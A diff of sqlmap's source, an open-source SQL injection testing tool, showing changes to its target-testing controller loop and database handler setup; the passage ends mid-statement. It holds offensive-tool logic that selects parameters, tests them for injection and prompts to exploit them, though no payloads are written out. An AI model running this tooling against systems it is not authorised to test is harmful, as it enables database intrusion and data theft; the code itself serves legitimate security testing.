|
conf.cookie = targetCookie
|
||||||
injData = []
|
conf.httpHeaders = list(initialHeaders)
|
||||||
|
conf.httpHeaders.extend(targetHeaders or [])
|
||||||
|
|
||||||
|
initTargetEnv()
|
||||||
|
parseTargetUrl()
|
||||||
|
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
|
||||||
|
for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
|
||||||
|
paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
|
||||||
|
|
||||||
|
if paramKey not in kb.testedParams:
|
||||||
|
testSqlInj = True
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
paramKey = (conf.hostname, conf.path, None, None)
|
||||||
|
if paramKey not in kb.testedParams:
|
||||||
|
testSqlInj = True
|
||||||
|
|
||||||
|
if testSqlInj and conf.hostname in kb.vulnHosts:
|
||||||
|
if kb.skipVulnHost is None:
|
||||||
|
message = "SQL injection vulnerability has already been detected "
|
||||||
|
message += "against '%s'. Do you want to skip " % conf.hostname
|
||||||
|
message += "further tests involving it? [Y/n]"
|
||||||
|
kb.skipVulnHost = readInput(message, default="Y").upper() != 'N'
|
||||||
|
testSqlInj = not kb.skipVulnHost
|
||||||
|
|
||||||
|
if not testSqlInj:
|
||||||
|
infoMsg = "skipping '%s'" % targetUrl
|
||||||
|
logger.info(infoMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
hostCount += 1
|
hostCount += 1
|
||||||
message = "url %d:\n%s %s" % (hostCount, conf.method or "GET", targetUrl)
|
|
||||||
|
if conf.forms and conf.method:
|
||||||
|
message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl)
|
||||||
|
else:
|
||||||
|
message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
||||||
|
|
||||||
if conf.cookie:
|
if conf.cookie:
|
||||||
message += "\nCookie: %s" % conf.cookie
|
message += "\nCookie: %s" % conf.cookie
|
||||||
|
|
||||||
if conf.data:
|
if conf.data is not None:
|
||||||
message += "\nPOST data: %s" % conf.data
|
message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
|
||||||
|
|
||||||
message += "\ndo you want to test this url? [Y/n/q] "
|
if conf.forms and conf.method:
|
||||||
|
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
||||||
|
continue
|
||||||
|
|
||||||
|
message += "\ndo you want to test this form? [Y/n/q] "
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
|
|
||||||
if not test:
|
if not test or test[0] in ("y", "Y"):
|
||||||
pass
|
if conf.method != HTTPMETHOD.GET:
|
||||||
|
message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
||||||
|
conf.data = readInput(message, default=conf.data)
|
||||||
|
conf.data = _randomFillBlankFields(conf.data)
|
||||||
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
|
else:
|
||||||
|
if targetUrl.find("?") > -1:
|
||||||
|
firstPart = targetUrl[:targetUrl.find("?")]
|
||||||
|
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
||||||
|
message = "Edit GET data [default: %s]: " % secondPart
|
||||||
|
test = readInput(message, default=secondPart)
|
||||||
|
test = _randomFillBlankFields(test)
|
||||||
|
conf.url = "%s?%s" % (firstPart, test)
|
||||||
|
|
||||||
|
parseTargetUrl()
|
||||||
|
|
||||||
elif test[0] in ("n", "N"):
|
elif test[0] in ("n", "N"):
|
||||||
continue
|
continue
|
||||||
elif test[0] in ("q", "Q"):
|
elif test[0] in ("q", "Q"):
|
||||||
break
|
break
|
||||||
|
|
||||||
logMsg = "testing url %s" % targetUrl
|
else:
|
||||||
logger.info(logMsg)
|
message += "\ndo you want to test this URL? [Y/n/q]"
|
||||||
|
|
||||||
initTargetEnv()
|
|
||||||
|
|
||||||
if not checkConnection() or not checkString() or not checkRegexp():
|
|
||||||
continue
|
|
||||||
|
|
||||||
for _, cookie in enumerate(conf.cj):
|
|
||||||
cookie = str(cookie)
|
|
||||||
index = cookie.index(" for ")
|
|
||||||
|
|
||||||
cookieStr += "%s;" % cookie[8:index]
|
|
||||||
|
|
||||||
if cookieStr:
|
|
||||||
cookieStr = cookieStr[:-1]
|
|
||||||
|
|
||||||
if "Cookie" in conf.parameters:
|
|
||||||
message = "you provided an HTTP Cookie header value. "
|
|
||||||
message += "The target url provided its own Cookie within "
|
|
||||||
message += "the HTTP Set-Cookie header. Do you want to "
|
|
||||||
message += "continue using the HTTP Cookie values that "
|
|
||||||
message += "you provided? [Y/n] "
|
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
|
|
||||||
if not test or test[0] in ("y", "Y"):
|
if not test or test[0] in ("y", "Y"):
|
||||||
setCookieAsInjectable = False
|
pass
|
||||||
|
elif test[0] in ("n", "N"):
|
||||||
if setCookieAsInjectable:
|
dataToStdout(os.linesep)
|
||||||
conf.httpHeaders.append(("Cookie", cookieStr))
|
|
||||||
conf.parameters["Cookie"] = cookieStr.replace("%", "%%")
|
|
||||||
__paramDict = paramToDict("Cookie", cookieStr)
|
|
||||||
|
|
||||||
if __paramDict:
|
|
||||||
conf.paramDict["Cookie"] = __paramDict
|
|
||||||
__testableParameters = True
|
|
||||||
|
|
||||||
if not kb.injPlace or not kb.injParameter or not kb.injType:
|
|
||||||
if not conf.string and not conf.regexp and not conf.eRegexp:
|
|
||||||
if not checkStability():
|
|
||||||
errMsg = "url is not stable, try with --string or "
|
|
||||||
errMsg += "--regexp options, refer to the user's manual "
|
|
||||||
errMsg += "paragraph 'Page comparison' for details"
|
|
||||||
|
|
||||||
if conf.multipleTargets:
|
|
||||||
errMsg += ", skipping to next url"
|
|
||||||
logger.warn(errMsg)
|
|
||||||
|
|
||||||
continue
|
continue
|
||||||
else:
|
elif test[0] in ("q", "Q"):
|
||||||
raise sqlmapConnectionException, errMsg
|
break
|
||||||
|
|
||||||
for place in conf.parameters.keys():
|
infoMsg = "testing URL '%s'" % targetUrl
|
||||||
if not conf.paramDict.has_key(place):
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
setupTargetEnv()
|
||||||
|
|
||||||
|
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
||||||
|
continue
|
||||||
|
|
||||||
|
checkWaf()
|
||||||
|
|
||||||
|
if conf.identifyWaf:
|
||||||
|
identifyWaf()
|
||||||
|
|
||||||
|
if conf.nullConnection:
|
||||||
|
checkNullConnection()
|
||||||
|
|
||||||
|
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
||||||
|
and (kb.injection.place is None or kb.injection.parameter is None):
|
||||||
|
|
||||||
|
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
||||||
|
# NOTE: this is not needed anymore, leaving only to display
|
||||||
|
# a warning message to the user in case the page is not stable
|
||||||
|
checkStability()
|
||||||
|
|
||||||
|
# Do a little prioritization reorder of a testable parameter list
|
||||||
|
parameters = conf.parameters.keys()
|
||||||
|
|
||||||
|
# Order of testing list (first to last)
|
||||||
|
orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
|
||||||
|
|
||||||
|
for place in orderList[::-1]:
|
||||||
|
if place in parameters:
|
||||||
|
parameters.remove(place)
|
||||||
|
parameters.insert(0, place)
|
||||||
|
|
||||||
|
proceed = True
|
||||||
|
for place in parameters:
|
||||||
|
# Test User-Agent and Referer headers only if
|
||||||
|
# --level >= 3
|
||||||
|
skip = (place == PLACE.USER_AGENT and conf.level < 3)
|
||||||
|
skip |= (place == PLACE.REFERER and conf.level < 3)
|
||||||
|
|
||||||
|
# Test Host header only if
|
||||||
|
# --level >= 5
|
||||||
|
skip |= (place == PLACE.HOST and conf.level < 5)
|
||||||
|
|
||||||
|
# Test Cookie header only if --level >= 2
|
||||||
|
skip |= (place == PLACE.COOKIE and conf.level < 2)
|
||||||
|
|
||||||
|
skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None))
|
||||||
|
skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None))
|
||||||
|
skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None))
|
||||||
|
skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None))
|
||||||
|
|
||||||
|
skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True))
|
||||||
|
skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True))
|
||||||
|
skip &= not (place == PLACE.HOST and intersect(HOST_ALIASES, conf.testParameter, True))
|
||||||
|
skip &= not (place == PLACE.COOKIE and intersect((PLACE.COOKIE,), conf.testParameter, True))
|
||||||
|
|
||||||
|
if skip:
|
||||||
|
continue
|
||||||
|
|
||||||
|
if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
|
||||||
|
continue
|
||||||
|
|
||||||
|
if place not in conf.paramDict:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
|
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
for parameter, value in paramDict.items():
|
for parameter, value in paramDict.items():
|
||||||
if not checkDynParam(place, parameter, value):
|
if not proceed:
|
||||||
warnMsg = "%s parameter '%s' is not dynamic" % (place, parameter)
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
for parenthesis in range(0, 4):
|
|
||||||
logMsg = "testing sql injection on %s " % place
|
|
||||||
logMsg += "parameter '%s' with " % parameter
|
|
||||||
logMsg += "%d parenthesis" % parenthesis
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
injType = checkSqlInjection(place, parameter, value, parenthesis)
|
|
||||||
|
|
||||||
if injType:
|
|
||||||
injData.append((place, parameter, injType))
|
|
||||||
|
|
||||||
break
|
break
|
||||||
else:
|
|
||||||
infoMsg = "%s parameter '%s' is not " % (place, parameter)
|
kb.vainRun = False
|
||||||
infoMsg += "injectable with %d parenthesis" % parenthesis
|
testSqlInj = True
|
||||||
|
paramKey = (conf.hostname, conf.path, place, parameter)
|
||||||
|
|
||||||
|
if paramKey in kb.testedParams:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
if not injData:
|
elif parameter in conf.testParameter:
|
||||||
warnMsg = "%s parameter '%s' is not " % (place, parameter)
|
pass
|
||||||
|
|
||||||
|
elif parameter == conf.rParam:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
elif parameter == conf.csrfToken:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
# Ignore session-like parameters for --level < 4
|
||||||
|
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
|
||||||
|
check = checkDynParam(place, parameter, value)
|
||||||
|
|
||||||
|
if not check:
|
||||||
|
warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if conf.skipStatic:
|
||||||
|
infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
testSqlInj = False
|
||||||
|
else:
|
||||||
|
infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
kb.testedParams.add(paramKey)
|
||||||
|
|
||||||
|
if testSqlInj:
|
||||||
|
try:
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
pushValue(kb.mergeCookies)
|
||||||
|
kb.mergeCookies = False
|
||||||
|
|
||||||
|
check = heuristicCheckSqlInjection(place, parameter)
|
||||||
|
|
||||||
|
if check != HEURISTIC_TEST.POSITIVE:
|
||||||
|
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
||||||
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
infoMsg = "testing for SQL injection on %s " % paramType
|
||||||
|
infoMsg += "parameter '%s'" % parameter
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
injection = checkSqlInjection(place, parameter, value)
|
||||||
|
proceed = not kb.endDetection
|
||||||
|
injectable = False
|
||||||
|
|
||||||
|
if getattr(injection, "place", None) is not None:
|
||||||
|
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes:
|
||||||
|
kb.falsePositives.append(injection)
|
||||||
|
else:
|
||||||
|
injectable = True
|
||||||
|
|
||||||
|
kb.injections.append(injection)
|
||||||
|
|
||||||
|
# In case when user wants to end detection phase (Ctrl+C)
|
||||||
|
if not proceed:
|
||||||
|
break
|
||||||
|
|
||||||
|
msg = "%s parameter '%s' " % (injection.place, injection.parameter)
|
||||||
|
msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
|
||||||
|
test = readInput(msg, default="N")
|
||||||
|
|
||||||
|
if test[0] not in ("y", "Y"):
|
||||||
|
proceed = False
|
||||||
|
paramKey = (conf.hostname, conf.path, None, None)
|
||||||
|
kb.testedParams.add(paramKey)
|
||||||
|
|
||||||
|
if not injectable:
|
||||||
|
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
|
||||||
warnMsg += "injectable"
|
warnMsg += "injectable"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if not kb.injPlace or not kb.injParameter or not kb.injType:
|
finally:
|
||||||
if len(injData) == 1:
|
if place == PLACE.COOKIE:
|
||||||
injDataSelected = injData[0]
|
kb.mergeCookies = popValue()
|
||||||
|
|
||||||
elif len(injData) > 1:
|
|
||||||
injDataSelected = __selectInjection(injData)
|
|
||||||
|
|
||||||
elif conf.multipleTargets:
|
|
||||||
continue
|
|
||||||
|
|
||||||
|
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
||||||
|
if kb.vainRun and not conf.multipleTargets:
|
||||||
|
errMsg = "no parameter(s) found for testing in the provided data "
|
||||||
|
errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
|
||||||
|
raise SqlmapNoneDataException(errMsg)
|
||||||
else:
|
else:
|
||||||
return
|
errMsg = "all tested parameters appear to be not injectable."
|
||||||
|
|
||||||
if injDataSelected == "Quit":
|
if conf.level < 5 or conf.risk < 3:
|
||||||
return
|
errMsg += " Try to increase '--level'/'--risk' values "
|
||||||
|
errMsg += "to perform more tests."
|
||||||
|
|
||||||
|
if isinstance(conf.tech, list) and len(conf.tech) < 5:
|
||||||
|
errMsg += " Rerun without providing the option '--technique'."
|
||||||
|
|
||||||
|
if not conf.textOnly and kb.originalPage:
|
||||||
|
percent = (100.0 * len(getFilteredPageContent(kb.originalPage)) / len(kb.originalPage))
|
||||||
|
|
||||||
|
if kb.dynamicMarkings:
|
||||||
|
errMsg += " You can give it a go with the switch '--text-only' "
|
||||||
|
errMsg += "if the target page has a low percentage "
|
||||||
|
errMsg += "of textual content (~%.2f%% of " % percent
|
||||||
|
errMsg += "page content is text)."
|
||||||
|
elif percent < LOW_TEXT_PERCENT and not kb.errorIsNone:
|
||||||
|
errMsg += " Please retry with the switch '--text-only' "
|
||||||
|
errMsg += "(along with --technique=BU) as this case "
|
||||||
|
errMsg += "looks like a perfect candidate "
|
||||||
|
errMsg += "(low textual content along with inability "
|
||||||
|
errMsg += "of comparison engine to detect at least "
|
||||||
|
errMsg += "one dynamic parameter)."
|
||||||
|
|
||||||
|
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
|
||||||
|
errMsg += " As heuristic test turned out positive you are "
|
||||||
|
errMsg += "strongly advised to continue on with the tests. "
|
||||||
|
errMsg += "Please, consider usage of tampering scripts as "
|
||||||
|
errMsg += "your target might filter the queries."
|
||||||
|
|
||||||
|
if not conf.string and not conf.notString and not conf.regexp:
|
||||||
|
errMsg += " Also, you can try to rerun by providing "
|
||||||
|
errMsg += "either a valid value for option '--string' "
|
||||||
|
errMsg += "(or '--regexp')."
|
||||||
|
elif conf.string:
|
||||||
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
|
errMsg += "valid value for option '--string' as perhaps the string you "
|
||||||
|
errMsg += "have chosen does not match "
|
||||||
|
errMsg += "exclusively True responses."
|
||||||
|
elif conf.regexp:
|
||||||
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
|
errMsg += "valid value for option '--regexp' as perhaps the regular "
|
||||||
|
errMsg += "expression that you have chosen "
|
||||||
|
errMsg += "does not match exclusively True responses."
|
||||||
|
|
||||||
|
if not conf.tamper:
|
||||||
|
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||||
|
errMsg += "involved (e.g. WAF) maybe you could retry "
|
||||||
|
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
|
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
||||||
else:
|
else:
|
||||||
kb.injPlace, kb.injParameter, kb.injType = injDataSelected
|
# Flush the flag
|
||||||
setInjection()
|
kb.testMode = False
|
||||||
|
|
||||||
if not conf.multipleTargets and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
|
_saveToResultsFile()
|
||||||
raise sqlmapNotVulnerableException, "all parameters are not injectable"
|
_saveToHashDB()
|
||||||
elif kb.injPlace and kb.injParameter and kb.injType:
|
_showInjections()
|
||||||
condition = False
|
_selectInjection()
|
||||||
|
|
||||||
|
if kb.injection.place is not None and kb.injection.parameter is not None:
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
message = "do you want to exploit this SQL injection? [Y/n] "
|
message = "do you want to exploit this SQL injection? [Y/n] "
|
||||||
exploit = readInput(message, default="Y")
|
exploit = readInput(message, default="Y")
|
||||||
|
|
||||||
if not exploit or exploit[0] in ("y", "Y"):
|
condition = not exploit or exploit[0] in ("y", "Y")
|
||||||
condition = True
|
|
||||||
else:
|
else:
|
||||||
condition = True
|
condition = True
|
||||||
|
|
||||||
if condition:
|
if condition:
|
||||||
checkForParenthesis()
|
|
||||||
createTargetDirs()
|
|
||||||
action()
|
action()
|
||||||
|
|
||||||
if conf.loggedToOut:
|
except KeyboardInterrupt:
|
||||||
logger.info("Fetched data logged to text files under '%s'" % conf.outputPath)
|
if conf.multipleTargets:
|
||||||
|
warnMsg = "user aborted in multiple target mode"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
message = "do you want to skip to the next target in list? [Y/n/q]"
|
||||||
|
test = readInput(message, default="Y")
|
||||||
|
|
||||||
|
if not test or test[0] in ("y", "Y"):
|
||||||
|
pass
|
||||||
|
elif test[0] in ("n", "N"):
|
||||||
|
return False
|
||||||
|
elif test[0] in ("q", "Q"):
|
||||||
|
raise SqlmapUserQuitException
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
|
||||||
|
except SqlmapUserQuitException:
|
||||||
|
raise
|
||||||
|
|
||||||
|
except SqlmapSilentQuitException:
|
||||||
|
raise
|
||||||
|
|
||||||
|
except SqlmapBaseException, ex:
|
||||||
|
errMsg = getSafeExString(ex)
|
||||||
|
|
||||||
|
if conf.multipleTargets:
|
||||||
|
_saveToResultsFile()
|
||||||
|
|
||||||
|
errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
logger.critical(errMsg)
|
||||||
|
return False
|
||||||
|
|
||||||
|
finally:
|
||||||
|
showHttpErrorCodes()
|
||||||
|
|
||||||
|
if kb.maxConnectionsFlag:
|
||||||
|
warnMsg = "it appears that the target "
|
||||||
|
warnMsg += "has a maximum connections "
|
||||||
|
warnMsg += "constraint"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if kb.dataOutputFlag and not conf.multipleTargets:
|
||||||
|
logger.info("fetched data logged to text files under '%s'" % conf.outputPath)
|
||||||
|
|
||||||
|
if conf.multipleTargets:
|
||||||
|
if conf.resultsFilename:
|
||||||
|
infoMsg = "you can find results of scanning in multiple targets "
|
||||||
|
infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
return True
|
||||||
|
|||||||
@@ -1,42 +1,51 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.common import Backend
|
||||||
|
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.dicts import DBMS_DICT
|
||||||
|
from lib.core.enums import DBMS
|
||||||
from lib.core.settings import MSSQL_ALIASES
|
from lib.core.settings import MSSQL_ALIASES
|
||||||
from lib.core.settings import MYSQL_ALIASES
|
from lib.core.settings import MYSQL_ALIASES
|
||||||
from lib.core.settings import ORACLE_ALIASES
|
from lib.core.settings import ORACLE_ALIASES
|
||||||
from lib.core.settings import PGSQL_ALIASES
|
from lib.core.settings import PGSQL_ALIASES
|
||||||
|
from lib.core.settings import SQLITE_ALIASES
|
||||||
|
from lib.core.settings import ACCESS_ALIASES
|
||||||
|
from lib.core.settings import FIREBIRD_ALIASES
|
||||||
|
from lib.core.settings import MAXDB_ALIASES
|
||||||
|
from lib.core.settings import SYBASE_ALIASES
|
||||||
|
from lib.core.settings import DB2_ALIASES
|
||||||
|
from lib.core.settings import HSQLDB_ALIASES
|
||||||
|
from lib.utils.sqlalchemy import SQLAlchemy
|
||||||
|
|
||||||
from plugins.dbms.mssqlserver import MSSQLServerMap
|
from plugins.dbms.mssqlserver import MSSQLServerMap
|
||||||
|
from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn
|
||||||
from plugins.dbms.mysql import MySQLMap
|
from plugins.dbms.mysql import MySQLMap
|
||||||
|
from plugins.dbms.mysql.connector import Connector as MySQLConn
|
||||||
from plugins.dbms.oracle import OracleMap
|
from plugins.dbms.oracle import OracleMap
|
||||||
|
from plugins.dbms.oracle.connector import Connector as OracleConn
|
||||||
from plugins.dbms.postgresql import PostgreSQLMap
|
from plugins.dbms.postgresql import PostgreSQLMap
|
||||||
|
from plugins.dbms.postgresql.connector import Connector as PostgreSQLConn
|
||||||
|
from plugins.dbms.sqlite import SQLiteMap
|
||||||
|
from plugins.dbms.sqlite.connector import Connector as SQLiteConn
|
||||||
|
from plugins.dbms.access import AccessMap
|
||||||
|
from plugins.dbms.access.connector import Connector as AccessConn
|
||||||
|
from plugins.dbms.firebird import FirebirdMap
|
||||||
|
from plugins.dbms.firebird.connector import Connector as FirebirdConn
|
||||||
|
from plugins.dbms.maxdb import MaxDBMap
|
||||||
|
from plugins.dbms.maxdb.connector import Connector as MaxDBConn
|
||||||
|
from plugins.dbms.sybase import SybaseMap
|
||||||
|
from plugins.dbms.sybase.connector import Connector as SybaseConn
|
||||||
|
from plugins.dbms.db2 import DB2Map
|
||||||
|
from plugins.dbms.db2.connector import Connector as DB2Conn
|
||||||
|
from plugins.dbms.hsqldb import HSQLDBMap
|
||||||
|
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
|
||||||
|
|
||||||
def setHandler():
|
def setHandler():
|
||||||
"""
|
"""
|
||||||
@@ -44,28 +53,63 @@ def setHandler():
|
|||||||
management system.
|
management system.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
count = 0
|
items = [
|
||||||
dbmsNames = ( "MySQL", "Oracle", "PostgreSQL", "Microsoft SQL Server" )
|
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
|
||||||
dbmsMap = (
|
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
|
||||||
( MYSQL_ALIASES, MySQLMap ),
|
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
|
||||||
( ORACLE_ALIASES, OracleMap ),
|
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
|
||||||
( PGSQL_ALIASES, PostgreSQLMap ),
|
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
|
||||||
( MSSQL_ALIASES, MSSQLServerMap ),
|
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
|
||||||
)
|
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
|
||||||
|
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
|
||||||
|
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
|
||||||
|
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
|
||||||
|
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
|
||||||
|
]
|
||||||
|
|
||||||
for dbmsAliases, dbmsEntry in dbmsMap:
|
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
|
||||||
if conf.dbms and conf.dbms not in dbmsAliases:
|
if _:
|
||||||
debugMsg = "skipping test for %s" % dbmsNames[count]
|
items.remove(_)
|
||||||
|
items.insert(0, _)
|
||||||
|
|
||||||
|
for dbms, aliases, Handler, Connector in items:
|
||||||
|
if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
|
||||||
|
debugMsg = "skipping test for %s" % dbms
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
count += 1
|
|
||||||
continue
|
continue
|
||||||
|
|
||||||
dbmsHandler = dbmsEntry()
|
handler = Handler()
|
||||||
|
conf.dbmsConnector = Connector()
|
||||||
|
|
||||||
if dbmsHandler.checkDbms():
|
if conf.direct:
|
||||||
if not conf.dbms or conf.dbms in dbmsAliases:
|
logger.debug("forcing timeout to 10 seconds")
|
||||||
kb.dbmsDetected = True
|
conf.timeout = 10
|
||||||
|
|
||||||
return dbmsHandler
|
dialect = DBMS_DICT[dbms][3]
|
||||||
|
|
||||||
return None
|
if dialect:
|
||||||
|
sqlalchemy = SQLAlchemy(dialect=dialect)
|
||||||
|
sqlalchemy.connect()
|
||||||
|
|
||||||
|
if sqlalchemy.connector:
|
||||||
|
conf.dbmsConnector = sqlalchemy
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
conf.dbmsConnector.connect()
|
||||||
|
except NameError:
|
